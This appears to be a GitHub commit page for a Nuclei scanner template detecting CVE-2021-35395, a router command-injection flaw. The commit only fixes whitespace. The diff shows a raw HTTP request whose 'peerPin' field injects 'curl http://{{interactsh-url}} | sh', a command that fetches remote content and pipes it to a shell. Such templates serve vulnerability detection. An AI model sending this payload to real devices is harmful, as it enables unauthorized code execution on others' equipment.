Skip to content

Commit

Permalink
Fix indentation and trailing whitespace
Browse files Browse the repository at this point in the history
  • Loading branch information
king-alexander committed Oct 5, 2023
1 parent 5416d4c commit 37f55b8
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions http/cves/2021/CVE-2021-35395.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -11,12 +11,12 @@ info:

http:
- raw:
- |
- |

Check failure on line 14 in http/cves/2021/CVE-2021-35395.yaml

View workflow job for this annotation

GitHub Actions / build

14:6 [indentation] wrong indentation: expected 6 but found 5
POST /goform/formWsc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
# The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
matchers:
- type: word
Expand Down

0 comments on commit 37f55b8

Please sign in to comment.